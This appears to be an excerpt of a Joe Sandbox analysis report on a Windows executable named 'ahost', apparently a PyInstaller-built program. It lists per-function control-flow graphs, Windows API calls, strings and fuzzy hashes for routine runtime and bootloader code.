                                                                                                                                                                                                                              • Instruction ID: eecde7c6ea699e9c6b7cf2505e17ef71a381290a3032c452aa2b6ac0013e6856
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0741F321F19A0681FB16EF16BD04576A2B1BF84BA4FC84535DE3D877D9EE3CE40482A0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF7F91E3804), ref: 00007FF7F91E36E1
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF7F91E3804), ref: 00007FF7F91E36EB
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2C9E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2D63
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E2C50: MessageBoxW.USER32 ref: 00007FF7F91E2D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                              • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                              • Instruction ID: 5a8add56418033b7c39bdd4b8d641fa12143a0809633e240a8bfd8e2d45399db
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA214FA1F1864242FB61BF24FC113BAA2B0BF44354FC04131D67D825EDEE2CE50583A5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 744 7ff7f91fbacc-7ff7f91fbaf2 745 7ff7f91fbaf4-7ff7f91fbb08 call 7ff7f91f4f58 call 7ff7f91f4f78 744->745 746 7ff7f91fbb0d-7ff7f91fbb11 744->746 760 7ff7f91fbefe 745->760 747 7ff7f91fbee7-7ff7f91fbef3 call 7ff7f91f4f58 call 7ff7f91f4f78 746->747 748 7ff7f91fbb17-7ff7f91fbb1e 746->748 767 7ff7f91fbef9 call 7ff7f91fa950 747->767 748->747 750 7ff7f91fbb24-7ff7f91fbb52 748->750 750->747 754 7ff7f91fbb58-7ff7f91fbb5f 750->754 757 7ff7f91fbb61-7ff7f91fbb73 call 7ff7f91f4f58 call 7ff7f91f4f78 754->757 758 7ff7f91fbb78-7ff7f91fbb7b 754->758 757->767 763 7ff7f91fbee3-7ff7f91fbee5 758->763 764 7ff7f91fbb81-7ff7f91fbb87 758->764 765 7ff7f91fbf01-7ff7f91fbf18 760->765 763->765 764->763 768 7ff7f91fbb8d-7ff7f91fbb90 764->768 767->760 768->757 771 7ff7f91fbb92-7ff7f91fbbb7 768->771 773 7ff7f91fbbea-7ff7f91fbbf1 771->773 774 7ff7f91fbbb9-7ff7f91fbbbb 771->774 777 7ff7f91fbbc6-7ff7f91fbbdd call 7ff7f91f4f58 call 7ff7f91f4f78 call 7ff7f91fa950 773->777 778 7ff7f91fbbf3-7ff7f91fbc1b call 7ff7f91fd66c call 7ff7f91fa9b8 * 2 773->778 775 7ff7f91fbbe2-7ff7f91fbbe8 774->775 776 7ff7f91fbbbd-7ff7f91fbbc4 774->776 780 7ff7f91fbc68-7ff7f91fbc7f 775->780 776->775 776->777 808 7ff7f91fbd70 777->808 804 7ff7f91fbc1d-7ff7f91fbc33 call 7ff7f91f4f78 call 7ff7f91f4f58 778->804 805 7ff7f91fbc38-7ff7f91fbc63 call 7ff7f91fc2f4 778->805 783 7ff7f91fbc81-7ff7f91fbc89 780->783 784 7ff7f91fbcfa-7ff7f91fbd04 call 7ff7f920398c 780->784 783->784 788 7ff7f91fbc8b-7ff7f91fbc8d 783->788 795 7ff7f91fbd8e 784->795 796 7ff7f91fbd0a-7ff7f91fbd1f 784->796 788->784 792 7ff7f91fbc8f-7ff7f91fbca5 788->792 792->784 797 7ff7f91fbca7-7ff7f91fbcb3 792->797 800 7ff7f91fbd93-7ff7f91fbdb3 ReadFile 795->800 796->795 802 7ff7f91fbd21-7ff7f91fbd33 GetConsoleMode 796->802 797->784 803 7ff7f91fbcb5-7ff7f91fbcb7 797->803 806 7ff7f91fbead-7ff7f91fbeb6 GetLastError 800->806 807 7ff7f91fbdb9-7ff7f91fbdc1 800->807 802->795 809 7ff7f91fbd35-7ff7f91fbd3d 802->809 803->784 810 7ff7f91fbcb9-7ff7f91fbcd1 803->810 804->808 805->780 816 7ff7f91fbed3-7ff7f91fbed6 806->816 817 7ff7f91fbeb8-7ff7f91fbece call 7ff7f91f4f78 call 7ff7f91f4f58 806->817 807->806 813 7ff7f91fbdc7 807->813 818 7ff7f91fbd73-7ff7f91fbd7d call 7ff7f91fa9b8 808->818 809->800 815 7ff7f91fbd3f-7ff7f91fbd61 ReadConsoleW 809->815 810->784 811 7ff7f91fbcd3-7ff7f91fbcdf 810->811 811->784 819 7ff7f91fbce1-7ff7f91fbce3 811->819 823 7ff7f91fbdce-7ff7f91fbde3 813->823 825 7ff7f91fbd63 GetLastError 815->825 826 7ff7f91fbd82-7ff7f91fbd8c 815->826 820 7ff7f91fbedc-7ff7f91fbede 816->820 821 7ff7f91fbd69-7ff7f91fbd6b call 7ff7f91f4eec 816->821 817->808 818->765 819->784 830 7ff7f91fbce5-7ff7f91fbcf5 819->830 820->818 821->808 823->818 832 7ff7f91fbde5-7ff7f91fbdf0 823->832 825->821 826->823 830->784 836 7ff7f91fbdf2-7ff7f91fbe0b call 7ff7f91fb6e4 832->836 837 7ff7f91fbe17-7ff7f91fbe1f 832->837 844 7ff7f91fbe10-7ff7f91fbe12 836->844 841 7ff7f91fbe21-7ff7f91fbe33 837->841 842 7ff7f91fbe9b-7ff7f91fbea8 call 7ff7f91fb524 837->842 845 7ff7f91fbe35 841->845 846 7ff7f91fbe8e-7ff7f91fbe96 841->846 842->844 844->818 848 7ff7f91fbe3a-7ff7f91fbe41 845->848 846->818 849 7ff7f91fbe43-7ff7f91fbe47 848->849 850 7ff7f91fbe7d-7ff7f91fbe88 848->850 851 7ff7f91fbe63 849->851 852 7ff7f91fbe49-7ff7f91fbe50 849->852 850->846 854 7ff7f91fbe69-7ff7f91fbe79 851->854 852->851 853 7ff7f91fbe52-7ff7f91fbe56 852->853 853->851 855 7ff7f91fbe58-7ff7f91fbe61 853->855 854->848 856 7ff7f91fbe7b 854->856 855->854 856->846
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                              • Instruction ID: 9884b20202ac9e5118205879b2a86619ab924cd8e6f72585e4f3ceca5fcae30c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35C1D522E4868A41F770AF15A8402BDA771EB81B88FD54131EB7E037D9EF7CE45583A0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 995526605-0
                                                                                                                                                                                                                              • Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                              • Instruction ID: 3e67797ca99e94f9b8a64403ca713613a826ad76c5961b2764defaac184ec210
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A214F21E0864642EB54BF55B85462AE3B1EB85BA0F900235EA7D83AF8DE6CE4548790

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E8760: GetCurrentProcess.KERNEL32 ref: 00007FF7F91E8780
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E8760: OpenProcessToken.ADVAPI32 ref: 00007FF7F91E8793
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E8760: GetTokenInformation.KERNELBASE ref: 00007FF7F91E87B8
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E8760: GetLastError.KERNEL32 ref: 00007FF7F91E87C2
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E8760: GetTokenInformation.KERNELBASE ref: 00007FF7F91E8802
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7F91E881E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E8760: CloseHandle.KERNEL32 ref: 00007FF7F91E8836
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF7F91E3C55), ref: 00007FF7F91E916C
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF7F91E3C55), ref: 00007FF7F91E9175
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                              • API String ID: 6828938-1529539262
                                                                                                                                                                                                                              • Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                                                                                                                                              • Instruction ID: f52c2e59d6eabb2681fe2eb025459f3205580425a49e92bc7aa3a3892b7ead54
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88212C21E0874282F754BF10ED156EAA275EF88780FC44431EA6E977DADE3CE44587A1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 963 7ff7f91fcfd0-7ff7f91fcff5 964 7ff7f91fd2c3 963->964 965 7ff7f91fcffb-7ff7f91fcffe 963->965 968 7ff7f91fd2c5-7ff7f91fd2d5 964->968 966 7ff7f91fd000-7ff7f91fd032 call 7ff7f91fa884 965->966 967 7ff7f91fd037-7ff7f91fd063 965->967 966->968 970 7ff7f91fd065-7ff7f91fd06c 967->970 971 7ff7f91fd06e-7ff7f91fd074 967->971 970->966 970->971 973 7ff7f91fd076-7ff7f91fd07f call 7ff7f91fc390 971->973 974 7ff7f91fd084-7ff7f91fd099 call 7ff7f920398c 971->974 973->974 978 7ff7f91fd1b3-7ff7f91fd1bc 974->978 979 7ff7f91fd09f-7ff7f91fd0a8 974->979 981 7ff7f91fd210-7ff7f91fd235 WriteFile 978->981 982 7ff7f91fd1be-7ff7f91fd1c4 978->982 979->978 980 7ff7f91fd0ae-7ff7f91fd0b2 979->980 983 7ff7f91fd0b4-7ff7f91fd0bc call 7ff7f91f4830 980->983 984 7ff7f91fd0c3-7ff7f91fd0ce 980->984 985 7ff7f91fd240 981->985 986 7ff7f91fd237-7ff7f91fd23d GetLastError 981->986 987 7ff7f91fd1c6-7ff7f91fd1c9 982->987 988 7ff7f91fd1fc-7ff7f91fd20e call 7ff7f91fca88 982->988 983->984 990 7ff7f91fd0d0-7ff7f91fd0d9 984->990 991 7ff7f91fd0df-7ff7f91fd0f4 GetConsoleMode 984->991 993 7ff7f91fd243 985->993 986->985 994 7ff7f91fd1cb-7ff7f91fd1ce 987->994 995 7ff7f91fd1e8-7ff7f91fd1fa call 7ff7f91fcca8 987->995 1010 7ff7f91fd1a0-7ff7f91fd1a7 988->1010 990->978 990->991 1000 7ff7f91fd1ac 991->1000 1001 7ff7f91fd0fa-7ff7f91fd100 991->1001 1003 7ff7f91fd248 993->1003 996 7ff7f91fd254-7ff7f91fd25e 994->996 997 7ff7f91fd1d4-7ff7f91fd1e6 call 7ff7f91fcb8c 994->997 995->1010 1004 7ff7f91fd260-7ff7f91fd265 996->1004 1005 7ff7f91fd2bc-7ff7f91fd2c1 996->1005 997->1010 1000->978 1008 7ff7f91fd106-7ff7f91fd109 1001->1008 1009 7ff7f91fd189-7ff7f91fd19b call 7ff7f91fc610 1001->1009 1011 7ff7f91fd24d 1003->1011 1012 7ff7f91fd293-7ff7f91fd29d 1004->1012 1013 7ff7f91fd267-7ff7f91fd26a 1004->1013 1005->968 1015 7ff7f91fd114-7ff7f91fd122 1008->1015 1016 7ff7f91fd10b-7ff7f91fd10e 1008->1016 1009->1010 1010->1003 1011->996 1020 7ff7f91fd2a4-7ff7f91fd2b3 1012->1020 1021 7ff7f91fd29f-7ff7f91fd2a2 1012->1021 1018 7ff7f91fd283-7ff7f91fd28e call 7ff7f91f4f34 1013->1018 1019 7ff7f91fd26c-7ff7f91fd27b 1013->1019 1022 7ff7f91fd124 1015->1022 1023 7ff7f91fd180-7ff7f91fd184 1015->1023 1016->1011 1016->1015 1018->1012 1019->1018 1020->1005 1021->964 1021->1020 1025 7ff7f91fd128-7ff7f91fd13f call 7ff7f9203a58 1022->1025 1023->993 1029 7ff7f91fd141-7ff7f91fd14d 1025->1029 1030 7ff7f91fd177-7ff7f91fd17d GetLastError 1025->1030 1031 7ff7f91fd14f-7ff7f91fd161 call 7ff7f9203a58 1029->1031 1032 7ff7f91fd16c-7ff7f91fd173 1029->1032 1030->1023 1031->1030 1036 7ff7f91fd163-7ff7f91fd16a 1031->1036 1032->1023 1034 7ff7f91fd175 1032->1034 1034->1025 1036->1032
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F91FCFBB), ref: 00007FF7F91FD0EC
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F91FCFBB), ref: 00007FF7F91FD177
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                              • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                              • Instruction ID: 95ac1f716c7b547e45bd5979ec6250e9bc7c00d28693dac436bdd0a91e3080b6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2391D526E1865985F750AF65AC402BDABB0AB40B8CF944135DF3E57AC8EF38D446C7E0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                              • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                              • Instruction ID: 5b99d0963e6d5cbf6175fddd5112a3b6e5f3c26b27ac0fc5bf3803346ebff192
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3941A622D1878583F750AF20A914379A670FB94758F908335E77C03AD9EF7CA5E087A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                              • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                              • Instruction ID: 559177495319094697045fd01ce889ceb8905b357269d72fbb773dcead9883eb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79312B24E0814646FB64BF24BC213B9A6B1AF41384FC44434EA3E472DFDE2DB50582F2
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                              • Instruction ID: 8a88b46d2201af9c89bc7ecee7a6ba6d2b91abfc5e5834153926408265c6a977
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBD06714F0864A42FF683F706C9907C9271AF48745B941438CA3B463EFED2CA44943A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                              • Instruction ID: c96c9b31988018986e1f3885fe58d5b314b84a6d3d30878889b1be9de6293051
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9051D861F0964946FB64AE25AC0067AE6A1AF44BACF944734DF7D437CDEF3CD4018AA0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
